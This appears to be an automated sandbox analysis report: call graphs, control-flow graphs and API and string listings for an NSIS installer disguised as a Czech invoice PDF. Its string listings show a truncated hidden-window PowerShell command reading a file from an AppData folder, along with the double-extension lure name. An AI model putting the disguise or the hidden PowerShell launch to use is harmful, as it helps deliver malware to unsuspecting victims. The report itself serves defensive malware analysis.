calls 1625->1626 1628 405e83 1626->1628 1627->1620 1627->1623 1646 405c96 GetFileAttributesW CreateFileW 1628->1646 1630 405e90 1630->1623 1631 405e9f GetFileSize GlobalAlloc 1630->1631 1632 405ec1 1631->1632 1633 405f56 CloseHandle 1631->1633 1634 405d19 ReadFile 1632->1634 1633->1623 1635 405ec9 1634->1635 1635->1633 1647 405bfb lstrlenA 1635->1647 1638 405ee0 lstrcpyA 1642 405f02 1638->1642 1639 405ef4 1640 405bfb 4 API calls 1639->1640 1640->1642 1641 405f39 SetFilePointer 1643 405d48 WriteFile 1641->1643 1642->1641 1644 405f4f GlobalFree 1643->1644 1644->1633 1645->1624 1646->1630 1648 405c3c lstrlenA 1647->1648 1649 405c44 1648->1649 1650 405c15 lstrcmpiA 1648->1650 1649->1638 1649->1639 1650->1649 1651 405c33 CharNextA 1650->1651 1651->1648 1652->1473 1654 405b3d 1653->1654 1656 405b4f 1653->1656 1654->1656 1657 405b4a CharNextW 1654->1657 1655 405b73 1655->1476 1655->1477 1656->1655 1658 405aa2 CharNextW 1656->1658 1657->1655 1658->1656 1660 406425 1659->1660 1661 40641a FindClose 1659->1661 1660->1480 1661->1660 1664 403883 1662->1664 1663 40384d 1666 4058b2 1663->1666 1664->1663 1665 403888 FreeLibrary GlobalFree 1664->1665 1665->1663 1665->1665 1667 405b7d 18 API calls 1666->1667 1668 4058d2 1667->1668 1669 4058f1 1668->1669 1670 4058da DeleteFileW 1668->1670 1672 405a11 1669->1672 1703 4060c1 lstrcpynW 1669->1703 1671 403663 OleUninitialize 1670->1671 1671->1280 1671->1281 1672->1671 1679 406404 2 API calls 1672->1679 1674 405917 1675 40592a 1674->1675 1676 40591d lstrcatW 1674->1676 1678 405ac1 2 API calls 1675->1678 1677 405930 1676->1677 1680 405940 lstrcatW 1677->1680 1682 40594b lstrlenW FindFirstFileW 1677->1682 1678->1677 1681 405a36 1679->1681 1680->1682 1681->1671 1683 405a75 3 API calls 1681->1683 1682->1672 1695 40596d 1682->1695 1684 405a40 1683->1684 1686 40586a 5 API calls 1684->1686 1685 4059f4 FindNextFileW 1689 405a0a FindClose 1685->1689 1685->1695 1688 405a4c 1686->1688 1690 405a50 1688->1690 1691 405a66 1688->1691 1689->1672 1690->1671 1696 405220 25 API calls 1690->1696 1693 405220 25 API calls 1691->1693 1693->1671 1694 4058b2 62 API calls 1701 4059be 1694->1701 1695->1685 1695->1694 1695->1701 1704 4060c1 lstrcpynW 1695->1704 1705 40586a 1695->1705 1697 405a5d 1696->1697 1698 405f62 38 API calls 1697->1698 1698->1671 1699 405220 25 API calls 1699->1685 1700 405220 25 API calls 1700->1701 1701->1685 1701->1699 1701->1700 1702 405f62 38 API calls 1701->1702 1702->1701 1703->1674 1704->1695 1713 405c71 GetFileAttributesW 1705->1713 1708 405897 1708->1695 1709 405885 RemoveDirectoryW 1711 405893 1709->1711 1710 40588d DeleteFileW 1710->1711 1711->1708 1712 4058a3 SetFileAttributesW 1711->1712 1712->1708 1714 405876 1713->1714 1715 405c83 SetFileAttributesW 1713->1715 1714->1708 1714->1709 1714->1710 1715->1714 1809 402d98 1810 402dc3 1809->1810 1811 402daa SetTimer 1809->1811 1812 402e18 1810->1812 1813 402ddd MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 1810->1813 1811->1810 1813->1812 1716 403cad 1717 403e00 1716->1717 1718 403cc5 1716->1718 1720 403e11 GetDlgItem GetDlgItem 1717->1720 1721 403e51 1717->1721 1718->1717 1719 403cd1 1718->1719 1723 403cdc SetWindowPos 1719->1723 1724 403cef 1719->1724 1725 404185 19 API calls 1720->1725 1722 403eab 1721->1722 1730 401389 2 API calls 1721->1730 1726 4041d1 SendMessageW 1722->1726 1746 403dfb 1722->1746 1723->1724 1727 403cf4 ShowWindow 1724->1727 1728 403d0c 1724->1728 1729 403e3b SetClassLongW 1725->1729 1776 403ebd 1726->1776 1727->1728 1731 403d14 DestroyWindow 1728->1731 1732 403d2e 1728->1732 1733 40140b 2 API calls 1729->1733 1736 403e83 1730->1736 1785 40410e 1731->1785 1734 403d33 SetWindowLongW 1732->1734 1735 403d44 1732->1735 1733->1721 1734->1746 1737 403d50 GetDlgItem 1735->1737 1738 403ded 1735->1738 1736->1722 1739 403e87 SendMessageW 1736->1739 1742 403d63 SendMessageW IsWindowEnabled 1737->1742 1748 403d80 1737->1748 1795 4041ec 1738->1795 1739->1746 1740 40140b 2 API calls 1740->1776 1741 404110 DestroyWindow EndDialog 1741->1785 1742->1746 1742->1748 1744 40413f ShowWindow 1744->1746 1745 4060e3 18 API calls 1745->1776 1747 403d85 1792 40415e 1747->1792 1748->1747 1749 403d8d 1748->1749 1752 403dd4 SendMessageW 1748->1752 1753 403da0 1748->1753 1749->1747 1749->1752 1751 404185 19 API calls 1751->1776 1752->1738 1755 403da8 1753->1755 1756 403dbd 1753->1756 1754 403dbb 1754->1738 1758 40140b 2 API calls 1755->1758 1757 40140b 2 API calls 1756->1757 1759 403dc4 1757->1759 1758->1747 1759->1738 1759->1747 1761 403f38 GetDlgItem 1762 403f55 ShowWindow KiUserCallbackDispatcher 1761->1762 1763 403f4d 1761->1763 1789 4041a7 KiUserCallbackDispatcher 1762->1789 1763->1762 1765 403f7f EnableWindow 1768 403f93 1765->1768 1766 403f98 GetSystemMenu EnableMenuItem SendMessageW 1767 403fc8 SendMessageW 1766->1767 1766->1768 1767->1768 1768->1766 1790 4041ba SendMessageW 1768->1790 1791 4060c1 lstrcpynW 1768->1791 1771 403ff6 lstrlenW 1772 4060e3 18 API calls 1771->1772 1773 40400c SetWindowTextW 1772->1773 1774 401389 2 API calls 1773->1774 1774->1776 1775 404050 DestroyWindow 1777 40406a CreateDialogParamW 1775->1777 1775->1785 1776->1740 1776->1741 1776->1745 1776->1746 1776->1751 1776->1775 1786 404185 1776->1786 1778 40409d 1777->1778 1777->1785 1779 404185 19 API calls 1778->1779 1780 4040a8 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 1779->1780 1781 401389 2 API calls 1780->1781 1782 4040ee 1781->1782 1782->1746 1783 4040f6 ShowWindow 1782->1783 1784 4041d1 SendMessageW 1783->1784 1784->1785 1785->1744 1785->1746 1787 4060e3 18 API calls 1786->1787 1788 404190 SetDlgItemTextW 1787->1788 1788->1761 1789->1765 1790->1768 1791->1771 1793 404165 1792->1793 1794 40416b SendMessageW 1792->1794 1793->1794 1794->1754 1796 404204 GetWindowLongW 1795->1796 1806 40428d 1795->1806 1797 404215 1796->1797 1796->1806 1798 404224 GetSysColor 1797->1798 1799 404227 1797->1799 1798->1799 1800 404237 SetBkMode 1799->1800 1801 40422d SetTextColor 1799->1801 1802 404255 1800->1802 1803 40424f GetSysColor 1800->1803 1801->1800 1804 404266 1802->1804 1805 40425c SetBkColor 1802->1805 1803->1802 1804->1806 1807 404280 CreateBrushIndirect 1804->1807 1808 404279 DeleteObject 1804->1808 1805->1804 1806->1746 1807->1806 1808->1807

                          Callgraph

                          • Executed
                          • Not Executed
                          • Opacity -> Relevance
                          • Disassembly available
                          callgraph 0 Function_004060C1 1 Function_00405AC1 2 Function_00405CC5 3 Function_00405D48 4 Function_004032C9 5 Function_0040654C 6 Function_004041D1 7 Function_00405C51 8 Function_00406355 8->7 19 Function_00405AEC 8->19 53 Function_00405AA2 8->53 9 Function_004064D7 10 Function_00406757 40 Function_0040708F 10->40 42 Function_00407110 10->42 55 Function_0040702A 10->55 11 Function_0040385A 12 Function_0040415E 13 Function_004032E0 13->2 13->8 18 Function_0040576C 13->18 13->19 26 Function_00405A75 13->26 14 Function_00403BE0 16 Function_004060E3 14->16 34 Function_00406008 14->34 52 Function_00406021 14->52 15 Function_00405F62 23 Function_00405DF0 15->23 16->0 16->8 16->16 16->34 39 Function_00405F8E 16->39 17 Function_0040586A 24 Function_00405C71 17->24 20 Function_004041EC 21 Function_0040136D 21->52 22 Function_004056EF 23->3 23->7 23->16 28 Function_00405BFB 23->28 44 Function_00405C96 23->44 46 Function_00405D19 23->46 25 Function_004052F3 25->6 35 Function_00401389 25->35 27 Function_00403875 27->11 29 Function_00405B7D 29->0 29->1 29->8 29->26 31 Function_00406404 29->31 50 Function_00405B20 29->50 30 Function_00402E82 30->0 30->1 30->4 30->5 30->7 30->44 48 Function_00402E1E 30->48 60 Function_004032B3 30->60 64 Function_004030BB 30->64 32 Function_00404185 32->16 33 Function_00405806 35->21 61 Function_00401434 35->61 36 Function_00405789 47 Function_0040649B 36->47 37 Function_0040390A 37->0 37->1 37->11 37->14 37->16 37->25 37->26 37->29 37->34 38 Function_0040140B 37->38 37->39 37->47 37->53 56 Function_0040642B 37->56 38->35 41 Function_0040660F 43 Function_00403311 43->0 43->13 43->15 43->16 43->18 43->22 43->29 43->30 43->33 43->36 43->37 43->38 43->47 51 Function_004057A1 43->51 43->53 43->56 58 Function_00403830 43->58 45 Function_00402D98 47->56 48->9 49 Function_00405220 49->16 50->53 54 Function_004041A7 57 Function_00403CAD 57->0 57->6 57->12 57->16 57->20 57->32 57->35 57->38 57->54 62 Function_004041BA 57->62 58->27 59 Function_004058B2 58->59 59->0 59->1 59->15 59->17 59->26 59->29 59->31 59->49 59->59 60->46 63 Function_004065BA 63->10 63->41 64->3 64->4 64->49 64->60 64->63

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 403311-403344 SetErrorMode GetVersion 1 403346-40334e call 40649b 0->1 2 403357 0->2 1->2 7 403350 1->7 4 40335c-403370 call 40642b lstrlenA 2->4 9 403372-4033e6 call 40649b * 2 #17 OleInitialize SHGetFileInfoW call 4060c1 GetCommandLineW call 4060c1 GetModuleHandleW 4->9 7->2 18 4033f0-40340a call 405aa2 CharNextW 9->18 19 4033e8-4033ef 9->19 22 403410-403416 18->22 23 403521-40353b GetTempPathW call 4032e0 18->23 19->18 25 403418-40341d 22->25 26 40341f-403423 22->26 30 403593-4035ad DeleteFileW call 402e82 23->30 31 40353d-40355b GetWindowsDirectoryW lstrcatW call 4032e0 23->31 25->25 25->26 28 403425-403429 26->28 29 40342a-40342e 26->29 28->29 32 403434-40343a 29->32 33 4034ed-4034fa call 405aa2 29->33 51 4035b3-4035b9 30->51 52 40365e-40366e call 403830 OleUninitialize 30->52 31->30 48 40355d-40358d GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4032e0 31->48 37 403455-40348e 32->37 38 40343c-403444 32->38 49 4034fc-4034fd 33->49 50 4034fe-403504 33->50 39 403490-403495 37->39 40 4034ab-4034e5 37->40 44 403446-403449 38->44 45 40344b 38->45 39->40 46 403497-40349f 39->46 40->33 47 4034e7-4034eb 40->47 44->37 44->45 45->37 54 4034a1-4034a4 46->54 55 4034a6 46->55 47->33 56 40350c-40351a call 4060c1 47->56 48->30 48->52 49->50 50->22 58 40350a 50->58 59 40364e-403655 call 40390a 51->59 60 4035bf-4035ca call 405aa2 51->60 67 403794-40379a 52->67 68 403674-403684 call 405806 ExitProcess 52->68 54->40 54->55 55->40 63 40351f 56->63 58->63 70 40365a 59->70 74 403618-403622 60->74 75 4035cc-403601 60->75 63->23 72 403818-403820 67->72 73 40379c-4037b2 GetCurrentProcess OpenProcessToken 67->73 70->52 77 403822 72->77 78 403826-40382a ExitProcess 72->78 82 4037b4-4037e2 LookupPrivilegeValueW AdjustTokenPrivileges 73->82 83 4037e8-4037f6 call 40649b 73->83 80 403624-403632 call 405b7d 74->80 81 40368a-40369e call 405789 lstrcatW 74->81 76 403603-403607 75->76 84 403610-403614 76->84 85 403609-40360e 76->85 77->78 80->52 93 403634-40364a call 4060c1 * 2 80->93 94 4036a0-4036a6 lstrcatW 81->94 95 4036ab-4036c5 lstrcatW lstrcmpiW 81->95 82->83 96 403804-40380f ExitWindowsEx 83->96 97 4037f8-403802 83->97 84->76 89 403616 84->89 85->84 85->89 89->74 93->59 94->95 95->52 100 4036c7-4036ca 95->100 96->72 98 403811-403813 call 40140b 96->98 97->96 97->98 98->72 103 4036d3 call 40576c 100->103 104 4036cc call 4056ef 100->104 109 4036d8-4036e6 SetCurrentDirectoryW 103->109 111 4036d1 104->111 112 4036f3-40371c call 4060c1 109->112 113 4036e8-4036ee call 4060c1 109->113 111->109 117 403721-40373d call 4060e3 DeleteFileW 112->117 113->112 120 40377e-403786 117->120 121 40373f-40374f CopyFileW 117->121 120->117 122 403788-40378f call 405f62 120->122 121->120 123 403751-40376a call 405f62 call 4060e3 call 4057a1 121->123 122->52 131 40376f-403771 123->131 131->120 132 403773-40377a CloseHandle 131->132 132->120
                          APIs
                          • SetErrorMode.KERNELBASE ref: 00403334
                          • GetVersion.KERNEL32 ref: 0040333A
                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403363
                          • #17.COMCTL32(00000007,00000009), ref: 00403386
                          • OleInitialize.OLE32(00000000), ref: 0040338D
                          • SHGetFileInfoW.SHELL32(0079FEE0,00000000,?,000002B4,00000000), ref: 004033A9
                          • GetCommandLineW.KERNEL32(007A7A20,NSIS Error), ref: 004033BE
                          • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe",00000000), ref: 004033D1
                          • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe",00000020), ref: 004033F8
                            • Part of subcall function 0040649B: GetModuleHandleA.KERNEL32(?,00000020,?,0040337A,00000009), ref: 004064AD
                            • Part of subcall function 0040649B: GetProcAddress.KERNEL32(00000000,?), ref: 004064C8
                          • GetTempPathW.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\), ref: 00403532
                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB), ref: 00403543
                          • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 0040354F
                          • GetTempPathW.KERNEL32(000003FC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 00403563
                          • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low), ref: 0040356B
                          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low), ref: 0040357C
                          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\), ref: 00403584
                          • DeleteFileW.KERNELBASE(1033), ref: 00403598
                            • Part of subcall function 004060C1: lstrcpynW.KERNEL32(?,?,00000400,004033BE,007A7A20,NSIS Error), ref: 004060CE
                          • OleUninitialize.OLE32(?), ref: 00403663
                          • ExitProcess.KERNEL32 ref: 00403684
                          • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,~nsu), ref: 00403697
                          • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,0040A26C), ref: 004036A6
                          • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,.tmp), ref: 004036B1
                          • lstrcmpiW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user~1\AppData\Local\Temp\,.tmp,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe",00000000,?), ref: 004036BD
                          • SetCurrentDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\), ref: 004036D9
                          • DeleteFileW.KERNEL32(0079F6E0,0079F6E0,?,"powershell.exe" -windowstyle hidden "$Repowered144=Get-Content 'C:\Users\user\AppData\Local\twinsomeness\Telefonsvarer\Svens,?), ref: 00403733
                          • CopyFileW.KERNEL32(C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe,0079F6E0,00000001), ref: 00403747
                          • CloseHandle.KERNEL32(00000000,0079F6E0,0079F6E0,?,0079F6E0,00000000), ref: 00403774
                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 004037A3
                          • OpenProcessToken.ADVAPI32(00000000), ref: 004037AA
                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004037BF
                          • AdjustTokenPrivileges.ADVAPI32 ref: 004037E2
                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403807
                          • ExitProcess.KERNEL32 ref: 0040382A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1226053516.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1226037640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226068869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Vyuctovani_2024_07-1206812497#U00b7pdf.jbxd
                          Similarity
                          • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                          • String ID: "C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe"$"powershell.exe" -windowstyle hidden "$Repowered144=Get-Content 'C:\Users\user\AppData\Local\twinsomeness\Telefonsvarer\Svens$.tmp$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Local\twinsomeness$C:\Users\user\AppData\Local\twinsomeness\Telefonsvarer$C:\Users\user\Desktop$C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                          • API String ID: 2488574733-3112765919
                          • Opcode ID: b157897f41e49d76ae2a424120b5c2a4585d2e59855415331baa82df7090685b
                          • Instruction ID: 1d18e1ae4f12dbf1a70a21db887ff621c25f6ffaea09574894501c471ee002d0
                          • Opcode Fuzzy Hash: b157897f41e49d76ae2a424120b5c2a4585d2e59855415331baa82df7090685b
                          • Instruction Fuzzy Hash: 9CD1E571100310ABD720BF759D45A2B3AADEF8174AF10483EF581B62D1DF7D8A458B6E

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 377 4060e3-4060ee 378 4060f0-4060ff 377->378 379 406101-406117 377->379 378->379 380 40611d-40612a 379->380 381 40632f-406335 379->381 380->381 384 406130-406137 380->384 382 40633b-406346 381->382 383 40613c-406149 381->383 385 406351-406352 382->385 386 406348-40634c call 4060c1 382->386 383->382 387 40614f-40615b 383->387 384->381 386->385 389 406161-40619d 387->389 390 40631c 387->390 391 4061a3-4061ae GetVersion 389->391 392 4062bd-4062c1 389->392 393 40632a-40632d 390->393 394 40631e-406328 390->394 397 4061b0-4061b4 391->397 398 4061c8 391->398 395 4062c3-4062c7 392->395 396 4062f6-4062fa 392->396 393->381 394->381 400 4062d7-4062e4 call 4060c1 395->400 401 4062c9-4062d5 call 406008 395->401 403 406309-40631a lstrlenW 396->403 404 4062fc-406304 call 4060e3 396->404 397->398 399 4061b6-4061ba 397->399 402 4061cf-4061d6 398->402 399->398 405 4061bc-4061c0 399->405 415 4062e9-4062f2 400->415 401->415 407 4061d8-4061da 402->407 408 4061db-4061dd 402->408 403->381 404->403 405->398 411 4061c2-4061c6 405->411 407->408 413 406219-40621c 408->413 414 4061df-4061fc call 405f8e 408->414 411->402 418 40622c-40622f 413->418 419 40621e-40622a GetSystemDirectoryW 413->419 422 406201-406205 414->422 415->403 417 4062f4 415->417 423 4062b5-4062bb call 406355 417->423 420 406231-40623f GetWindowsDirectoryW 418->420 421 40629a-40629c 418->421 424 40629e-4062a2 419->424 420->421 421->424 425 406241-40624b 421->425 426 4062a4-4062a8 422->426 427 40620b-406214 call 4060e3 422->427 423->403 424->423 424->426 429 406265-40627b SHGetSpecialFolderLocation 425->429 430 40624d-406250 425->430 426->423 432 4062aa-4062b0 lstrcatW 426->432 427->424 435 406296 429->435 436 40627d-406294 SHGetPathFromIDListW CoTaskMemFree 429->436 430->429 434 406252-406259 430->434 432->423 438 406261-406263 434->438 435->421 436->424 436->435 438->424 438->429
                          APIs
                          • GetVersion.KERNEL32(00000000,udvistes,?,00405257,udvistes,00000000,00000000,00796DF3), ref: 004061A6
                          • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 00406224
                          • GetWindowsDirectoryW.KERNEL32(: Completed,00000400), ref: 00406237
                          • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406273
                          • SHGetPathFromIDListW.SHELL32(?,: Completed), ref: 00406281
                          • CoTaskMemFree.OLE32(?), ref: 0040628C
                          • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004062B0
                          • lstrlenW.KERNEL32(: Completed,00000000,udvistes,?,00405257,udvistes,00000000,00000000,00796DF3), ref: 0040630A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1226053516.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1226037640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226068869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Vyuctovani_2024_07-1206812497#U00b7pdf.jbxd
                          Similarity
                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                          • String ID: "powershell.exe" -windowstyle hidden "$Repowered144=Get-Content 'C:\Users\user\AppData\Local\twinsomeness\Telefonsvarer\Svens$: Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$udvistes
                          • API String ID: 900638850-3385929949
                          • Opcode ID: 798394cd79efbf8b9b83d6ae683917ff9149f8dcce4e50bc544776fb700d76f6
                          • Instruction ID: 9b361a1576cc62e439b693cb4d410f4da8e3c7a326f6bf2b8b74f29af692ed76
                          • Opcode Fuzzy Hash: 798394cd79efbf8b9b83d6ae683917ff9149f8dcce4e50bc544776fb700d76f6
                          • Instruction Fuzzy Hash: 7B611471A00205ABDF20AF65DC40AAE37A5EF45314F12C17FE942BA2D0D63D89A5CB5E

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 439 4058b2-4058d8 call 405b7d 442 4058f1-4058f8 439->442 443 4058da-4058ec DeleteFileW 439->443 445 4058fa-4058fc 442->445 446 40590b-40591b call 4060c1 442->446 444 405a6e-405a72 443->444 447 405902-405905 445->447 448 405a1c-405a21 445->448 452 40592a-40592b call 405ac1 446->452 453 40591d-405928 lstrcatW 446->453 447->446 447->448 448->444 450 405a23-405a26 448->450 454 405a30-405a38 call 406404 450->454 455 405a28-405a2e 450->455 456 405930-405934 452->456 453->456 454->444 463 405a3a-405a4e call 405a75 call 40586a 454->463 455->444 459 405940-405946 lstrcatW 456->459 460 405936-40593e 456->460 462 40594b-405967 lstrlenW FindFirstFileW 459->462 460->459 460->462 464 405a11-405a15 462->464 465 40596d-405975 462->465 479 405a50-405a53 463->479 480 405a66-405a69 call 405220 463->480 464->448 467 405a17 464->467 468 405995-4059a9 call 4060c1 465->468 469 405977-40597f 465->469 467->448 481 4059c0-4059cb call 40586a 468->481 482 4059ab-4059b3 468->482 471 405981-405989 469->471 472 4059f4-405a04 FindNextFileW 469->472 471->468 475 40598b-405993 471->475 472->465 478 405a0a-405a0b FindClose 472->478 475->468 475->472 478->464 479->455 485 405a55-405a64 call 405220 call 405f62 479->485 480->444 492 4059ec-4059ef call 405220 481->492 493 4059cd-4059d0 481->493 482->472 486 4059b5-4059b9 call 4058b2 482->486 485->444 491 4059be 486->491 491->472 492->472 495 4059d2-4059e2 call 405220 call 405f62 493->495 496 4059e4-4059ea 493->496 495->472 496->472
                          APIs
                          • DeleteFileW.KERNELBASE(?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 004058DB
                          • lstrcatW.KERNEL32(007A3F28,\*.*), ref: 00405923
                          • lstrcatW.KERNEL32(?,0040A014), ref: 00405946
                          • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F28,?), ref: 0040594C
                          • FindFirstFileW.KERNEL32(007A3F28,?,?,?,0040A014,?,007A3F28,?), ref: 0040595C
                          • FindNextFileW.KERNEL32(00000000,?,000000F2,?,?,?,?,?), ref: 004059FC
                          • FindClose.KERNEL32(00000000), ref: 00405A0B
                          Strings
                          • "C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe", xrefs: 004058B2
                          • (?z, xrefs: 0040590B
                          • C:\Users\user~1\AppData\Local\Temp\, xrefs: 004058BF
                          • \*.*, xrefs: 0040591D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1226053516.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1226037640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226068869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Vyuctovani_2024_07-1206812497#U00b7pdf.jbxd
                          Similarity
                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                          • String ID: "C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe"$(?z$C:\Users\user~1\AppData\Local\Temp\$\*.*
